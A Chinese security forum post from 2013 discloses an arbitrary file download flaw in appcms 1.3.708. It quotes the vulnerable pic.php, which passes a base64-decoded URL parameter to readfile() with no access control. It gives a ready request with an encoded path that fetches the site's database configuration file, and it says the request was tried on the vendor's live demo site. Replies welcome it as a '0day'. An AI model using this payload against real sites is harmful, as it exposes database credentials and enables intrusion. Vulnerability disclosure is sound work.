appcms 最新版1.3.708 任意文件下载

土豆 · 发表于 2013-12-28 18:50:03

appcms 官网：http://www.appcms.cc/

appcms 最新版 1.3.708 任意文件下载
已经在官方演示网站验证

/pic.php

[PHP] 纯文本查看 复制代码

<?php
if(isset($_GET['url']) && trim($_GET['url']) != '' && isset($_GET['type'])) {
	$img_url = base64_decode($_GET['url']);
	//$shffix = substr($img_url,strrpos($img_url,'.'));
	$shffix = trim($_GET['type']);
	header("Content-Type: image/{$shffix}");
	readfile($img_url);
} else {
	die('image not find£¡');
}
?>

访问无任何控制，只是url进行了base64编码

只要构造文件路径base64即可任意文件下载

示例： /pic.php?url=Y29yZS9jb25maWcuY29ubi5waHA=&type=1.jpg

本地测试结果：

打开下载的文件看一下,

OK。

作者：lxj616

悲伤 · 发表于 2013-12-29 18:12:44

受教了，，，，，，，，，，沙发

efupay · 发表于 2014-1-1 10:41:48

很给力，喜欢oday

appcms 最新版1.3.708 任意文件下载

评分

指导单位

旗下站点

联系我们